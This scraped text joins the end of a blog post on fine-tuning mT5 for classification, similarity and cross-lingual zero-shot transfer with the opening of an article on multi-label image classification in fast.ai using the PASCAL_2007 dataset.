because mT5 is a sequence-to-sequence model which expects all inputs and outputs to be text sequences. If we have numeric values (or any other non-string values), we’ll run into errors during training." }, { "code": null, "e": 12490, "s": 12447, "text": "Next, we set up our pre-trained mT5 model." }, { "code": null, "e": 12613, "s": 12490, "text": "Here, we are configuring our mT5 model through model_args and instantiating a model with the pre-trained mt5-base weights." }, { "code": null, "e": 12743, "s": 12613, "text": "For more information about the different model_args and what they do, please refer to the Simple Transformers docs here and here." }, { "code": null, "e": 13110, "s": 12743, "text": "A model with this configuration can be trained on a GPU with 24 GB of VRAM. If your GPU has less VRAM than that and you run into CUDA memory issues, you can try using smaller train_batch_size and eval_batch_size values. You can also try using the google/mt5-small model which requires less memory (replace “google/mt5-base” with \"google/mt5-small\" in line 18 above)." }, { "code": null, "e": 13148, "s": 13110, "text": "Now, we just have to train our model!" }, { "code": null, "e": 13279, "s": 13148, "text": "The evaluation line is optional as we’ll be doing some real testing in the next section. You can comment it out to save some time." }, { "code": null, "e": 13374, "s": 13279, "text": "In our first test, we’ll follow the same evaluation procedure as in my original T5 experiment." }, { "code": null, "e": 13421, "s": 13374, "text": "Specifically, we’ll use the following metrics." }, { "code": null, "e": 13472, "s": 13421, "text": "Binary Classification: F1 score and Accuracy score" }, { "code": null, "e": 13614, "s": 13472, "text": "Multilabel Classification: F1 score (Hugging Face SQuAD metrics implementation) and Exact matches (Hugging Face SQuAD metrics implementation)" }, { "code": null, "e": 13683, "s": 13614, "text": "Similarity: Pearson correlation coefficient and Spearman correlation" }, { "code": null, "e": 13757, "s": 13683, "text": "First, we will define the functions to calculate the metrics given above." 
}, { "code": null, "e": 13825, "s": 13757, "text": "Next, we read in the evaluation dataset and process it for testing." }, { "code": null, "e": 13831, "s": 13825, "text": "Here," }, { "code": null, "e": 13929, "s": 13831, "text": "to_predict: List of input sequences with the prefix and : prepended as expected by the mT5 model." }, { "code": null, "e": 13956, "s": 13929, "text": "truth: List of true labels" }, { "code": null, "e": 14089, "s": 13956, "text": "tasks: List of tasks (binary classification, multilabel classification, or similarity) corresponding to each sequence in to_predict." }, { "code": null, "e": 14175, "s": 14089, "text": "Then, we load our trained mT5 model and generate predictions for each input sequence." }, { "code": null, "e": 14376, "s": 14175, "text": "As a sequence-to-sequence model, the decoding algorithm used and the hyperparameters (num_beams, do_sample, top_k, top_p) used to control it has a substantial impact on the quality of the predictions." }, { "code": null, "e": 14540, "s": 14376, "text": "If you’d like to learn more about the decoding process, please refer to the decoding algorithms section in this article and this excellent notebook by Huggingface." }, { "code": null, "e": 14631, "s": 14540, "text": "Now that we have our predictions (in df[\"predicted\"]), it’s time to calculate the metrics." }, { "code": null, "e": 14692, "s": 14631, "text": "Running this snippet of code yields the results shown below." }, { "code": null, "e": 15033, "s": 14692, "text": "-----------------------------------Results: Scores for binary classification:F1 score: 0.8974482916528863Accuracy Score: 0.893921052631579Scores for multilabel classification:F1 score: 0.8971675648577516Exact matches: 0.8971675648577516Scores for similarity:Pearson Correlation: 0.012219660470091782Spearman Correlation: 0.00885628521396601" }, { "code": null, "e": 15233, "s": 15033, "text": "Note that there is a degree of randomness when using sampling decoding algorithms, so the scores will change when the test is repeated. However, the scores should be relatively close to these values." }, { "code": null, "e": 15362, "s": 15233, "text": "Before we dig into these scores, let’s put them side-by-side (and round them off for clarity) with the T5 scores for comparison." }, { "code": null, "e": 15384, "s": 15362, "text": "Binary Classification" }, { "code": null, "e": 15519, "s": 15384, "text": "The mT5 model does a pretty good job at the binary classification task, although it does fall short of the scores set by the T5 model." }, { "code": null, "e": 15545, "s": 15519, "text": "Multilabel Classification" }, { "code": null, "e": 15668, "s": 15545, "text": "Similar story here with the multilabel classification task with the mT5 models doing well but not as well as the T5 model." }, { "code": null, "e": 15783, "s": 15668, "text": "Typically, a monolingual model will outperform a comparable multilingual model, so, these results are as expected." }, { "code": null, "e": 15794, "s": 15783, "text": "Similarity" }, { "code": null, "e": 15879, "s": 15794, "text": "Unlike the two previous tasks, the mT5 model fails miserably at sentence similarity." }, { "code": null, "e": 16024, "s": 15879, "text": "While it’s difficult to pinpoint the exact cause without more experimentation, the two reasons given below are likely to be largely responsible!" 
}, { "code": null, "e": 16470, "s": 16024, "text": "One significant difference between T5 and mT5 is that the former undergoes supervised training as part of the pre-training process while the latter does not. That is, the pre-trained T5 model (before we fine-tune it) is already trained on multiple downstream tasks in addition to its primary unsupervised training objective.This means that the T5 model has the advantage of prior training on the similarity task (as well as other similar tasks)." }, { "code": null, "e": 16842, "s": 16470, "text": "The similarity task is significantly underrepresented compared to the other two tasks. While this factor does affect the T5 model during fine-tuning, it appears that the supervised training during pre-training is able to compensate for it. Without the benefit of multi-task training during the pre-training process, this becomes a much harder challenge for the mT5 model." }, { "code": null, "e": 17027, "s": 16842, "text": "There might be other reasons (e.g. similarity being a sentence-pair task) and it’s likely that there are ways to get it to work for this task as well. Let me know if you find anything!" }, { "code": null, "e": 17167, "s": 17027, "text": "However, mT5 was never designed to beat T5 in English language tasks! So, let’s move on to the true test, cross-lingual zero-shot transfer." }, { "code": null, "e": 17311, "s": 17167, "text": "In this test, we want to see if an mT5 model trained on an English task can perform the same task in other languages, without further training." }, { "code": null, "e": 17634, "s": 17311, "text": "For this test, we’ll focus on the first task, i.e. binary classification. We won’t be testing on the other tasks as the second task involves a lot of toxic language (I don’t expect the translation models to perform well here). The third task is, unfortunately, disqualified by default as it didn’t do well even in English." }, { "code": null, "e": 17863, "s": 17634, "text": "Before we can test the cross-lingual capabilities of mT5, we’ll first need to translate our evaluation data. For this, we’ll use the pre-trained MarianMT models originally trained by Jörg Tiedemann using the Marian C++ library." }, { "code": null, "e": 17931, "s": 17863, "text": "First, we’ll set up our translation models in translation_models.py" }, { "code": null, "e": 18071, "s": 17931, "text": "Here, we are setting up functions to load four different translation models (english_to_romance_model will handle both French and Spanish)." }, { "code": null, "e": 18304, "s": 18071, "text": "Next, we’ll do use these models to translate our evaluation dataset. Note that, the translations may take some time depending on available computational resources. If you want to speed things up, you can test with one language only." }, { "code": null, "e": 18392, "s": 18304, "text": "To keep the code clean, we’ll be doing this step in another file, translate_dataset.py." }, { "code": null, "e": 18608, "s": 18392, "text": "You can drop the languages you don’t want from the languages list in line 51. You can also comment out the unused translation models defined in model_map to prevent them from being downloaded and loaded into memory." }, { "code": null, "e": 18708, "s": 18608, "text": "Running the script above will generate the translated datasets and save them to the data directory." }, { "code": null, "e": 18948, "s": 18708, "text": "The code to calculate the metrics can be easily adapted from our original evaluation code. 
The only differences are that we need to loop over the eval.csv files for each language and we’ll only be evaluating the binary classification task." }, { "code": null, "e": 18970, "s": 18948, "text": "Let’s see how we did!" }, { "code": null, "e": 19056, "s": 18970, "text": "Very impressive, considering the mT5 model was only fine-tuned on an English dataset!" }, { "code": null, "e": 19293, "s": 19056, "text": "Based on these results, it seems like mT5 favours more common languages, although that is to be expected. However, it’s also possible that this difference is due to translation models for more common languages being relatively superior." }, { "code": null, "e": 19495, "s": 19293, "text": "Unfortunately, it doesn’t perform well for all the supported languages. For example, I tried a few examples in my native language, Sinhalese, with fairly poor (although not completely useless) results." }, { "code": null, "e": 19649, "s": 19495, "text": "If you want to try some quick predictions yourself, use the command simple-viewerin the terminal (in the directory which contains the outputs directory)." }, { "code": null, "e": 19792, "s": 19649, "text": "Overall, I’m quite impressed with the performance of the mT5 model, particularly in the context of cross-lingual, zero-shot transfer learning." }, { "code": null, "e": 20123, "s": 19792, "text": "However, mT5 does seem to struggle with smaller datasets when compared to T5. Oversampling the similarity dataset to bring it in line with the others (or even training mT5 on this task alone) didn’t solve the issue, so it’s possible that the small size of the dataset isn’t the sole factor here. This calls for more investigation!" }, { "code": null, "e": 20362, "s": 20123, "text": "The ability to train a model on English data and have it automatically transfer that knowledge to a bunch of other languages can be incredibly useful, especially when you consider that most training datasets are only available in English." }, { "code": null, "e": 20456, "s": 20362, "text": "With such versatility, I’m sure that people will come up with a ton of creative applications!" }, { "code": null, "e": 20832, "s": 20456, "text": "mT5: A massively multilingual pre-trained text-to-text transformer — https://arxiv.org/pdf/2010.11934.pdfExploring the Limits of Transfer Learning with a Unified Text-to-Text Transformer — https://arxiv.org/abs/1910.10683Google AI Blog — https://ai.googleblog.com/2020/02/exploring-transfer-learning-with-t5.htmlHuggingface Transformers — https://huggingface.co/transformers/" }, { "code": null, "e": 20938, "s": 20832, "text": "mT5: A massively multilingual pre-trained text-to-text transformer — https://arxiv.org/pdf/2010.11934.pdf" }, { "code": null, "e": 21055, "s": 20938, "text": "Exploring the Limits of Transfer Learning with a Unified Text-to-Text Transformer — https://arxiv.org/abs/1910.10683" }, { "code": null, "e": 21147, "s": 21055, "text": "Google AI Blog — https://ai.googleblog.com/2020/02/exploring-transfer-learning-with-t5.html" } ]
Loading External Libraries in SAP UI5
External libraries can be inserted using a file in a normal script tag. SAP UI5 also supports jQuery, so a script element can be appended to the page head from the controller.
var s = document.createElement("script");
s.type = "text/javascript";
s.src = "http://domainname.com/somescript";
$("head").append(s);
You can also add any external file using the following commands −
jQuery.sap.registerModulePath("ModuleName","http://Domainname.com");
jQuery.sap.require("ModuleName.jsFileName");
You can refer to the following link for more details −
https://blogs.sap.com/2016/04/22/include-external-javascript-library-in-sapui5/
[ { "code": null, "e": 1228, "s": 1062, "text": "External libraries can be inserted using a file in a normal script tag. SAP UI5 also supports JQuery so it can be done by extending your heading from the controller." }, { "code": null, "e": 1363, "s": 1228, "text": "var s = document.createElement(\"script\");\ns.type = \"text/javascript\";\ns.src = \"http://domainname.com/somescript\";\n$(\"head\").append(s);" }, { "code": null, "e": 1428, "s": 1363, "text": "You can also add any external file using the following command −" }, { "code": null, "e": 1542, "s": 1428, "text": "jQuery.sap.registerModulePath(\"ModuleName\",\"http://Domainname.com\");\njQuery.sap.require(\"ModuleName.jsFileName\");" }, { "code": null, "e": 1599, "s": 1542, "text": "You can navigate to the following path for more details−" }, { "code": null, "e": 1679, "s": 1599, "text": "https://blogs.sap.com/2016/04/22/include-external-javascript-library-in-sapui5/" } ]
Exploratory Data Analysis: DataPrep.eda vs Pandas-Profiling | by Brandon Lockhart | Towards Data Science
Exploratory data analysis (EDA) is part and parcel of every data science project. The purpose of EDA is to achieve an understanding of the data and to gain insights about phenomena the data represents. Pandas-profiling (2016) has been lauded as an exemplary tool for doing EDA [1, 2, 3]. However, a significant downside of pandas-profiling is that it gives a dataset’s profile! EDA is an iterative process where the data scientist will question, understand, process, transform the data, and repeat [4, 5, 6]. The rigid structure of pandas-profiling is contrary to current EDA best practices. DataPrep.eda (2020) is a Python library for doing EDA produced by SFU’s Data Science Research Group. DataPrep.eda enables iterative and task-centric analysis — as EDA is meant to be done. (see this article for a comprehensive introduction to DataPrep.eda) Better API DesignUp to 100x FasterSmart VisualizationHandles Large Data Better API Design Up to 100x Faster Smart Visualization Handles Large Data “‘Exploratory data analysis’ is an attitude, a state of flexibility, a willingness to look for those things that we believe are not there, as well as those we believe to be there.” — John Tukey, Author of Exploratory Data Analysis We will use the plot() function from DataPrep.eda. To understand how to perform EDA effectively with this function, the following gives the syntax of the function call with the intent of the data scientist: plot(df): “I want an overview of the dataset” plot(df, “col_1”): “I want to understand the column col_1” plot(df, “col_1”, “col_2”): “I want to understand the relationship between columns col_1 and col_2” To see this in action, we will use a dataset consisting of records of COVID-19 patients in South Korea. Let’s start with an overview of the dataset: from dataprep.eda import plotimport pandas as pddf = pd.read_csv("PatientInfo.csv")df["confirmed_date"] = pd.to_datetime(df["confirmed_date"])plot(df) Notice the column birth_year seemingly has a bimodal distribution, let’s learn more about this column: # transform birth_year to age in 2020 for simplicitydf["age"] = 2020 - df["birth_year"]plot(df, "age", bins=26) Using the tooltip we can inspect the bounds of the modes, and use the various plots to attain a comprehensive understanding of this distribution. Next, let’s investigate the age distribution of men and women for contracting COVID-19. To do this, we simply add the column sex to the previous function call: plot(df, "age", "sex", bins=26) We see a large disparity in the age distributions for contracting COVID-19 between men and women — all with one simple line of code! This exemplifies how EDA is meant to be performed — question, visualize, understand, repeat. Taking under 0.5 seconds to finish each above command, DataPrep.eda is an efficient and effective tool for doing EDA. We run the following code where it takes pandas-profiling over 50 seconds to produce a report: from pandas_profiling import ProfileReportProfileReport(df).to_widgets() To analyze the univariate distributions, pandas-profiling has the following output: The user needs to toggle each column to see its information. Although we can find the bimodal distribution of birth_year, pandas-profiling has no support for further investigation of this insight, and no support for analyzing the relationship between age and sex. For this simple EDA scenario, DataPrep.eda enabled the discovery of significant insights, but pandas-profiling was inadequate. 
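For readers who want to reproduce the timing claims above — under half a second per DataPrep.eda call versus roughly 50 seconds for the full pandas-profiling report — here is a minimal sketch. The timing helper is not from the original article, pandas-profiling is rendered to HTML rather than to widgets, and absolute numbers will vary with hardware.

# Assumes dataprep and pandas-profiling are installed and PatientInfo.csv is
# in the working directory.
import time
import pandas as pd
from dataprep.eda import plot
from pandas_profiling import ProfileReport

df = pd.read_csv("PatientInfo.csv")
df["confirmed_date"] = pd.to_datetime(df["confirmed_date"])
df["age"] = 2020 - df["birth_year"]

def timed(label, fn):
    start = time.perf_counter()
    fn()                                              # build the visualization / report
    print(f"{label}: {time.perf_counter() - start:.2f} s")

timed('plot(df)', lambda: plot(df))
timed('plot(df, "age")', lambda: plot(df, "age", bins=26))
timed('plot(df, "age", "sex")', lambda: plot(df, "age", "sex", bins=26))
timed('ProfileReport(df)', lambda: ProfileReport(df).to_html())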
User interaction with the data is imperative for effective data understanding [7]. DataPrep.eda creates all plots with Bokeh, an interactive visualization library, and incorporates a tooltip which enables an exact reading of each component of a visualization. Pandas-profiling, however, does not support a tooltip. Recall that in Section 1 it took DataPrep.eda under 0.5 seconds to complete each task, yet it took pandas-profiling over 50 seconds to produce a report. DataPrep.eda is faster than pandas-profiling for two reasons: DataPrep.eda uses Dask, a parallel computing library, for all data processing. Pandas-profiling, however, uses Pandas.DataPrep.eda avoids unnecessary computation by creating visualizations relevant to the current EDA task, whereas pandas-profiling only profiles the entire dataset. DataPrep.eda uses Dask, a parallel computing library, for all data processing. Pandas-profiling, however, uses Pandas. DataPrep.eda avoids unnecessary computation by creating visualizations relevant to the current EDA task, whereas pandas-profiling only profiles the entire dataset. DataPrep.eda can be used to generate components of pandas-profiling’s report, enabling a direct performance comparison. The following figure shows the results of running pandas-profiling’s ProfileReport against three components of DataPrep.eda: univariate analysis (plot(df)), correlation matrices (plot_correlation(df)) and missing value plots (plot_missing(df)). Using Dask instead of Pandas is the main reason DataPrep.eda is faster than pandas-profiling. More specific factors affecting the performance are DataPrep.eda parallelizes univariate analysis, whereas pandas-profiling computes univariate statistics sequentially.DataPrep.eda using Dask supports block-wise computations, whereas Pandas-profiling performs computations over the whole dataset (significant for large datasets). DataPrep.eda parallelizes univariate analysis, whereas pandas-profiling computes univariate statistics sequentially. DataPrep.eda using Dask supports block-wise computations, whereas Pandas-profiling performs computations over the whole dataset (significant for large datasets). Some of the intelligent features of DataPrep.eda include selecting the right plots to visualize the data for each EDA task; column type inference (numerical, categorical, and datetime); finding an appropriate time unit for each plot (the user can also specify it); outputting the categorical values with the highest count for visual clarity (the user can also specify). To see these features in action, let’s understand how people are contracting COVID-19 over time, i.e., the relationship between the columns confirmed_date and infection_case. We run plot(df, "confirmed_date", "infection_case") We can easily see which methods of contraction are significant and during which periods! No! Pandas-profiling only supports interactions in the form of correlation matrices (also supported by DataPrep.eda) and a heat map for bivariate analysis of two continuous variables. Effective bivariate analysis is too expensive in a dataset-profiling framework since it must be computed for each pair of columns, even though only a small subset of relationships is likely interesting to a user. DataPrep.eda using Dask works with larger than memory datasets. Dask supports out-of-core and parallel processing so computations on very large datasets can be evaluated efficiently. 
Pandas-profiling using Pandas only has data structures for in-memory analytics; pandas-profiling suffers from significant performance degradation on large datasets. Exploratory data analysis is an iterative cycle with steps including Questioning the dataAnswering the questions by processing and visualizing the dataRefining previous questions after achieving a new understanding, or creating new questions Questioning the data Answering the questions by processing and visualizing the data Refining previous questions after achieving a new understanding, or creating new questions There is no one-size-fits-all data profile that is suitable for comprehensive EDA. DataPrep.eda is a better tool for doing EDA than pandas-profiling for four reasons: Better API design DataPrep.eda’s APIs are designed for EDA rather than data profilingUp to 100x FasterDataPrep.eda executes computations in parallelSmart VisualizationDataPrep.eda will automatically select the right plots to visualize the dataHandles Large DataDataPrep.eda supports out-of-core processing Better API design DataPrep.eda’s APIs are designed for EDA rather than data profiling Up to 100x FasterDataPrep.eda executes computations in parallel Smart VisualizationDataPrep.eda will automatically select the right plots to visualize the data Handles Large DataDataPrep.eda supports out-of-core processing It’s time to move on from generating a data profile, and perform EDA in the manner it’s meant to be done with DataPrep.eda. A notebook with the code from this article can be found here. To install DataPrep.eda, and for information about contributing to the project, visit here. A DataPrep.eda tutorial video can be found here. Don’t forget to star the project on GitHub ★. [1] M. Deep, Quick Exploratory Data Analysis: Pandas Profiling (2020), Medium [2] L. Frei, Speed Up Your Exploratory Data Analysis With Pandas-Profiling (2019), Towards Data Science [3] R. Rei, EDA Using Panda’s Profiling (2020), Towards Data Science [4] D. Bourke, A Gentle Introduction to Exploratory Data Analysis (2019), Towards Data Science [5] J. Wei, Exploratory Data Analysis: A Practical Guide and Template for Structured Data (2019), Towards Data Science [6] G. Grolemund and H. Wickham, R for Data Science (December 2016), Online Book [7] W. Koehrsen, The Next Level of Data Visualization in Python (2019), Towards Data Science
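For completeness, the two remaining DataPrep.eda entry points referenced in the component-wise comparison above are called the same way — a minimal sketch, again assuming PatientInfo.csv is available locally.

import pandas as pd
from dataprep.eda import plot_correlation, plot_missing

df = pd.read_csv("PatientInfo.csv")
plot_correlation(df)   # correlation matrices over the numerical columns
plot_missing(df)       # extent and impact of missing values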
[ { "code": null, "e": 373, "s": 171, "text": "Exploratory data analysis (EDA) is part and parcel of every data science project. The purpose of EDA is to achieve an understanding of the data and to gain insights about phenomena the data represents." }, { "code": null, "e": 763, "s": 373, "text": "Pandas-profiling (2016) has been lauded as an exemplary tool for doing EDA [1, 2, 3]. However, a significant downside of pandas-profiling is that it gives a dataset’s profile! EDA is an iterative process where the data scientist will question, understand, process, transform the data, and repeat [4, 5, 6]. The rigid structure of pandas-profiling is contrary to current EDA best practices." }, { "code": null, "e": 1019, "s": 763, "text": "DataPrep.eda (2020) is a Python library for doing EDA produced by SFU’s Data Science Research Group. DataPrep.eda enables iterative and task-centric analysis — as EDA is meant to be done. (see this article for a comprehensive introduction to DataPrep.eda)" }, { "code": null, "e": 1091, "s": 1019, "text": "Better API DesignUp to 100x FasterSmart VisualizationHandles Large Data" }, { "code": null, "e": 1109, "s": 1091, "text": "Better API Design" }, { "code": null, "e": 1127, "s": 1109, "text": "Up to 100x Faster" }, { "code": null, "e": 1147, "s": 1127, "text": "Smart Visualization" }, { "code": null, "e": 1166, "s": 1147, "text": "Handles Large Data" }, { "code": null, "e": 1347, "s": 1166, "text": "“‘Exploratory data analysis’ is an attitude, a state of flexibility, a willingness to look for those things that we believe are not there, as well as those we believe to be there.”" }, { "code": null, "e": 1397, "s": 1347, "text": "— John Tukey, Author of Exploratory Data Analysis" }, { "code": null, "e": 1604, "s": 1397, "text": "We will use the plot() function from DataPrep.eda. To understand how to perform EDA effectively with this function, the following gives the syntax of the function call with the intent of the data scientist:" }, { "code": null, "e": 1650, "s": 1604, "text": "plot(df): “I want an overview of the dataset”" }, { "code": null, "e": 1709, "s": 1650, "text": "plot(df, “col_1”): “I want to understand the column col_1”" }, { "code": null, "e": 1809, "s": 1709, "text": "plot(df, “col_1”, “col_2”): “I want to understand the relationship between columns col_1 and col_2”" }, { "code": null, "e": 1958, "s": 1809, "text": "To see this in action, we will use a dataset consisting of records of COVID-19 patients in South Korea. Let’s start with an overview of the dataset:" }, { "code": null, "e": 2109, "s": 1958, "text": "from dataprep.eda import plotimport pandas as pddf = pd.read_csv(\"PatientInfo.csv\")df[\"confirmed_date\"] = pd.to_datetime(df[\"confirmed_date\"])plot(df)" }, { "code": null, "e": 2212, "s": 2109, "text": "Notice the column birth_year seemingly has a bimodal distribution, let’s learn more about this column:" }, { "code": null, "e": 2324, "s": 2212, "text": "# transform birth_year to age in 2020 for simplicitydf[\"age\"] = 2020 - df[\"birth_year\"]plot(df, \"age\", bins=26)" }, { "code": null, "e": 2470, "s": 2324, "text": "Using the tooltip we can inspect the bounds of the modes, and use the various plots to attain a comprehensive understanding of this distribution." }, { "code": null, "e": 2630, "s": 2470, "text": "Next, let’s investigate the age distribution of men and women for contracting COVID-19. 
To do this, we simply add the column sex to the previous function call:" }, { "code": null, "e": 2662, "s": 2630, "text": "plot(df, \"age\", \"sex\", bins=26)" }, { "code": null, "e": 2795, "s": 2662, "text": "We see a large disparity in the age distributions for contracting COVID-19 between men and women — all with one simple line of code!" }, { "code": null, "e": 3006, "s": 2795, "text": "This exemplifies how EDA is meant to be performed — question, visualize, understand, repeat. Taking under 0.5 seconds to finish each above command, DataPrep.eda is an efficient and effective tool for doing EDA." }, { "code": null, "e": 3101, "s": 3006, "text": "We run the following code where it takes pandas-profiling over 50 seconds to produce a report:" }, { "code": null, "e": 3174, "s": 3101, "text": "from pandas_profiling import ProfileReportProfileReport(df).to_widgets()" }, { "code": null, "e": 3258, "s": 3174, "text": "To analyze the univariate distributions, pandas-profiling has the following output:" }, { "code": null, "e": 3522, "s": 3258, "text": "The user needs to toggle each column to see its information. Although we can find the bimodal distribution of birth_year, pandas-profiling has no support for further investigation of this insight, and no support for analyzing the relationship between age and sex." }, { "code": null, "e": 3649, "s": 3522, "text": "For this simple EDA scenario, DataPrep.eda enabled the discovery of significant insights, but pandas-profiling was inadequate." }, { "code": null, "e": 3964, "s": 3649, "text": "User interaction with the data is imperative for effective data understanding [7]. DataPrep.eda creates all plots with Bokeh, an interactive visualization library, and incorporates a tooltip which enables an exact reading of each component of a visualization. Pandas-profiling, however, does not support a tooltip." }, { "code": null, "e": 4117, "s": 3964, "text": "Recall that in Section 1 it took DataPrep.eda under 0.5 seconds to complete each task, yet it took pandas-profiling over 50 seconds to produce a report." }, { "code": null, "e": 4179, "s": 4117, "text": "DataPrep.eda is faster than pandas-profiling for two reasons:" }, { "code": null, "e": 4461, "s": 4179, "text": "DataPrep.eda uses Dask, a parallel computing library, for all data processing. Pandas-profiling, however, uses Pandas.DataPrep.eda avoids unnecessary computation by creating visualizations relevant to the current EDA task, whereas pandas-profiling only profiles the entire dataset." }, { "code": null, "e": 4580, "s": 4461, "text": "DataPrep.eda uses Dask, a parallel computing library, for all data processing. Pandas-profiling, however, uses Pandas." }, { "code": null, "e": 4744, "s": 4580, "text": "DataPrep.eda avoids unnecessary computation by creating visualizations relevant to the current EDA task, whereas pandas-profiling only profiles the entire dataset." }, { "code": null, "e": 5109, "s": 4744, "text": "DataPrep.eda can be used to generate components of pandas-profiling’s report, enabling a direct performance comparison. The following figure shows the results of running pandas-profiling’s ProfileReport against three components of DataPrep.eda: univariate analysis (plot(df)), correlation matrices (plot_correlation(df)) and missing value plots (plot_missing(df))." }, { "code": null, "e": 5255, "s": 5109, "text": "Using Dask instead of Pandas is the main reason DataPrep.eda is faster than pandas-profiling. 
More specific factors affecting the performance are" }, { "code": null, "e": 5533, "s": 5255, "text": "DataPrep.eda parallelizes univariate analysis, whereas pandas-profiling computes univariate statistics sequentially.DataPrep.eda using Dask supports block-wise computations, whereas Pandas-profiling performs computations over the whole dataset (significant for large datasets)." }, { "code": null, "e": 5650, "s": 5533, "text": "DataPrep.eda parallelizes univariate analysis, whereas pandas-profiling computes univariate statistics sequentially." }, { "code": null, "e": 5812, "s": 5650, "text": "DataPrep.eda using Dask supports block-wise computations, whereas Pandas-profiling performs computations over the whole dataset (significant for large datasets)." }, { "code": null, "e": 5869, "s": 5812, "text": "Some of the intelligent features of DataPrep.eda include" }, { "code": null, "e": 5936, "s": 5869, "text": "selecting the right plots to visualize the data for each EDA task;" }, { "code": null, "e": 5998, "s": 5936, "text": "column type inference (numerical, categorical, and datetime);" }, { "code": null, "e": 6077, "s": 5998, "text": "finding an appropriate time unit for each plot (the user can also specify it);" }, { "code": null, "e": 6182, "s": 6077, "text": "outputting the categorical values with the highest count for visual clarity (the user can also specify)." }, { "code": null, "e": 6364, "s": 6182, "text": "To see these features in action, let’s understand how people are contracting COVID-19 over time, i.e., the relationship between the columns confirmed_date and infection_case. We run" }, { "code": null, "e": 6409, "s": 6364, "text": "plot(df, \"confirmed_date\", \"infection_case\")" }, { "code": null, "e": 6498, "s": 6409, "text": "We can easily see which methods of contraction are significant and during which periods!" }, { "code": null, "e": 6895, "s": 6498, "text": "No! Pandas-profiling only supports interactions in the form of correlation matrices (also supported by DataPrep.eda) and a heat map for bivariate analysis of two continuous variables. Effective bivariate analysis is too expensive in a dataset-profiling framework since it must be computed for each pair of columns, even though only a small subset of relationships is likely interesting to a user." }, { "code": null, "e": 7078, "s": 6895, "text": "DataPrep.eda using Dask works with larger than memory datasets. Dask supports out-of-core and parallel processing so computations on very large datasets can be evaluated efficiently." }, { "code": null, "e": 7243, "s": 7078, "text": "Pandas-profiling using Pandas only has data structures for in-memory analytics; pandas-profiling suffers from significant performance degradation on large datasets." 
}, { "code": null, "e": 7312, "s": 7243, "text": "Exploratory data analysis is an iterative cycle with steps including" }, { "code": null, "e": 7485, "s": 7312, "text": "Questioning the dataAnswering the questions by processing and visualizing the dataRefining previous questions after achieving a new understanding, or creating new questions" }, { "code": null, "e": 7506, "s": 7485, "text": "Questioning the data" }, { "code": null, "e": 7569, "s": 7506, "text": "Answering the questions by processing and visualizing the data" }, { "code": null, "e": 7660, "s": 7569, "text": "Refining previous questions after achieving a new understanding, or creating new questions" }, { "code": null, "e": 7743, "s": 7660, "text": "There is no one-size-fits-all data profile that is suitable for comprehensive EDA." }, { "code": null, "e": 7827, "s": 7743, "text": "DataPrep.eda is a better tool for doing EDA than pandas-profiling for four reasons:" }, { "code": null, "e": 8133, "s": 7827, "text": "Better API design DataPrep.eda’s APIs are designed for EDA rather than data profilingUp to 100x FasterDataPrep.eda executes computations in parallelSmart VisualizationDataPrep.eda will automatically select the right plots to visualize the dataHandles Large DataDataPrep.eda supports out-of-core processing" }, { "code": null, "e": 8219, "s": 8133, "text": "Better API design DataPrep.eda’s APIs are designed for EDA rather than data profiling" }, { "code": null, "e": 8283, "s": 8219, "text": "Up to 100x FasterDataPrep.eda executes computations in parallel" }, { "code": null, "e": 8379, "s": 8283, "text": "Smart VisualizationDataPrep.eda will automatically select the right plots to visualize the data" }, { "code": null, "e": 8442, "s": 8379, "text": "Handles Large DataDataPrep.eda supports out-of-core processing" }, { "code": null, "e": 8566, "s": 8442, "text": "It’s time to move on from generating a data profile, and perform EDA in the manner it’s meant to be done with DataPrep.eda." }, { "code": null, "e": 8815, "s": 8566, "text": "A notebook with the code from this article can be found here. To install DataPrep.eda, and for information about contributing to the project, visit here. A DataPrep.eda tutorial video can be found here. Don’t forget to star the project on GitHub ★." }, { "code": null, "e": 8893, "s": 8815, "text": "[1] M. Deep, Quick Exploratory Data Analysis: Pandas Profiling (2020), Medium" }, { "code": null, "e": 8997, "s": 8893, "text": "[2] L. Frei, Speed Up Your Exploratory Data Analysis With Pandas-Profiling (2019), Towards Data Science" }, { "code": null, "e": 9066, "s": 8997, "text": "[3] R. Rei, EDA Using Panda’s Profiling (2020), Towards Data Science" }, { "code": null, "e": 9161, "s": 9066, "text": "[4] D. Bourke, A Gentle Introduction to Exploratory Data Analysis (2019), Towards Data Science" }, { "code": null, "e": 9280, "s": 9161, "text": "[5] J. Wei, Exploratory Data Analysis: A Practical Guide and Template for Structured Data (2019), Towards Data Science" }, { "code": null, "e": 9361, "s": 9280, "text": "[6] G. Grolemund and H. Wickham, R for Data Science (December 2016), Online Book" } ]
Multi-Label Classification in fast.ai Using Spreadsheets | by Vinayak Nayak | Towards Data Science
IntroductionThe DatasetModel, Activation Function and LossModel EvaluationConclusionReferences Introduction The Dataset Model, Activation Function and Loss Model Evaluation Conclusion References Many a time we come across images which have multiple objects of interest in them which we wish to identify. For instance, in the following image we can see that we have both a chair and a tv monitor. To solve the above problem, we need to be able to detect multiple classes/labels in a given image. This is what multi-label classification is. Given an image, categorize it into more than one class/label/category. Since fastai is a very convenient wrapper around Pytorch, there's very little that we will have to change from the perspective of code but the logic behind solving this problem will be somewhat different. We cannot just use our regular softmax activation with cross-entropy loss function; also the evaluation bit here is much more involved than that of a single-label classification problem. We shall discuss every bit in detail in the following sections. Let's first begin with the dataset. We will be using the PASCAL_2007 dataset for this task. This is a dataset which contains 20 labels in all and mind the fact that one image can have multiple labels! Simply use fastai’s untar_data to download the dataset to your disk. It will be stored in a special directory called .fastai at your home/root location from fastai.vision.all import *path = untar_data(URLs.PASCAL_2007) If we look at the stats from a label POV for our train dataset, we obtain the following. From the above figure we can see that “person” is a highly recurring category in the train dataset and other categories are more or less equally represented. So, we have an imbalance in our dataset. Another interesting thing to note is that the sum of label counts is not the same as number of data points. In single label this used to be true because every image had one and only one label but in case of a multi-label classifier, since each datapoint is not bound to have only one object, it is worth noting that there can be more labels than number of images. This will lead us to change our strategy for building classifiers as against single-label classification. In this dataset, we’re given the labels in the form of a dataframe and not in a folder structure, same as in Imagenet. So we’ll have to read each entry from the dataframe and define getter methods to retrieve the values of input and output. Also, the split is defined using a column in the dataframe called is_valid. We shall define a custom function that provides the splits i.e. indices of the train and validation set separately for all the points in our dataset. In code, this looks as follows Now, we can define a dataloader once we have the proper getters for the three main tasks i.e. getting dependent & independent variable and how to split them into train and validation files. Unlike single label classification tasks, for this task, we will have to use the MultiCategoryBlock in order to read our dependent variables as one-hot encoded vectors. The rest of the loading remains the same. We can load the data as follows Our independent variable is an Image hence ImageBlock as input followed by a MultiCategoryBlock for one-hot encoding and loading the dependent variable. 
